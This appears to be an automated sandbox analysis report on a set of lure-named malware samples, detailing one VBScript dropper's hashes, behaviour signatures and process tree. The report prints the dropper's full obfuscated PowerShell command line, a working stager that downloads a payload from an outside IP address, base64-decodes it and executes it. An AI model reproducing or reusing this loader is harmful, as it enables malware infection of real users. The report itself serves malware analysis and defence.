Overview
overview
10Static
static
5Dropped Ma...2f.exe
windows11-21h2-x64
Dropped Malware/1.exe
windows11-21h2-x64
Dropped Ma...29.exe
windows11-21h2-x64
10Dropped Ma...89.xls
windows11-21h2-x64
1Dropped Ma...df.exe
windows11-21h2-x64
8Dropped Ma...er.exe
windows11-21h2-x64
10Dropped Ma...df.exe
windows11-21h2-x64
8Dropped Ma...00.exe
windows11-21h2-x64
7Dropped Ma...DF.bat
windows11-21h2-x64
8Dropped Ma...61.exe
windows11-21h2-x64
10Dropped Ma...df.exe
windows11-21h2-x64
10Dropped Ma...89.xls
windows11-21h2-x64
1Dropped Ma...df.exe
windows11-21h2-x64
8Dropped Ma...df.exe
windows11-21h2-x64
5Dropped Ma...00.vbs
windows11-21h2-x64
8Dropped Ma...df.exe
windows11-21h2-x64
8Dropped Ma...B).vbs
windows11-21h2-x64
10Dropped Ma...df.exe
windows11-21h2-x64
3Analysis
-
max time kernel
297s -
max time network
293s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-07-2024 23:01
Static task
static1
Behavioral task
behavioral1
Sample
Dropped Malware/01622664c6bf1a51484157d73fb4a42f.exe
Resource
win11-20240611-en
Behavioral task
behavioral2
Sample
Dropped Malware/1.exe
Resource
win11-20240508-en
Behavioral task
behavioral3
Sample
Dropped Malware/BNP DOC 12578945329763-7633562829.exe
Resource
win11-20240508-en
Behavioral task
behavioral4
Sample
Dropped Malware/Comprobante de pago_978989689.xls
Resource
win11-20240508-en
Behavioral task
behavioral5
Sample
Dropped Malware/Document BT24·pdf.exe
Resource
win11-20240611-en
Behavioral task
behavioral6
Sample
Dropped Malware/Jailkeeper.exe
Resource
win11-20240419-en
Behavioral task
behavioral7
Sample
Dropped Malware/LHDNM TAKSIRAN 2023·pdf.exe
Resource
win11-20240611-en
Behavioral task
behavioral8
Sample
Dropped Malware/Order 000293884849900.exe
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
Dropped Malware/PO 903886563 PDF.bat
Resource
win11-20240611-en
Behavioral task
behavioral10
Sample
Dropped Malware/PO2024-0961.exe
Resource
win11-20240508-en
Behavioral task
behavioral11
Sample
Dropped Malware/PRODUCTS LIST pdf.exe
Resource
win11-20240508-en
Behavioral task
behavioral12
Sample
Dropped Malware/Product Inquiry466789.xls
Resource
win11-20240611-en
Behavioral task
behavioral13
Sample
Dropped Malware/Quote Request (Tupy S.A.) 523AM - 924BR·pdf.exe
Resource
win11-20240508-en
Behavioral task
behavioral14
Sample
Dropped Malware/REQUEST FOR QUOTATION_pdf.exe
Resource
win11-20240419-en
Behavioral task
behavioral15
Sample
Dropped Malware/Transaction_Execution_Confirmation_000000.vbs
Resource
win11-20240508-en
Behavioral task
behavioral16
Sample
Dropped Malware/faktura_7171503997·pdf.exe
Resource
win11-20240611-en
Behavioral task
behavioral17
Sample
Dropped Malware/ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Resource
win11-20240611-en
Behavioral task
behavioral18
Sample
Dropped Malware/帳單發票_200548224648·pdf.exe
Resource
win11-20240611-en
General
-
Target
Dropped Malware/Transaction_Execution_Confirmation_000000.vbs
-
Size
187KB
-
MD5
37f090cc76db33c457b77c6b2c6bb13d
-
SHA1
7c499fca1564ea4fb48cc2b72212bc3f857443ab
-
SHA256
36e517cbfb12bd2e58446d7ae27d76baf3e454a793e8c629667fe067839ec23f
-
SHA512
90aeb5b01c9309c49f35541d97f7532ed7a564fee986bf111a6f33bb41339e54f9972368179632ee5d6bdd8840811dc665a56ff5a26b159bbe764279f7be0de3
-
SSDEEP
3072:VmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZJ:V08GxbKja3+DCbKCvBB/WnHXC/sLJFJW
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 8 1308 powershell.exe 11 1308 powershell.exe 12 1308 powershell.exe 13 1308 powershell.exe 14 1308 powershell.exe 16 1308 powershell.exe 18 1308 powershell.exe 20 1308 powershell.exe 21 1308 powershell.exe 23 1308 powershell.exe 24 1308 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1308 powershell.exe 1308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1308 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1444 wrote to memory of 1308 1444 WScript.exe 78 PID 1444 wrote to memory of 1308 1444 WScript.exe 78 PID 1308 wrote to memory of 3004 1308 powershell.exe 80 PID 1308 wrote to memory of 3004 1308 powershell.exe 80
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dropped Malware\Transaction_Execution_Confirmation_000000.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"3⤵PID:3004
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82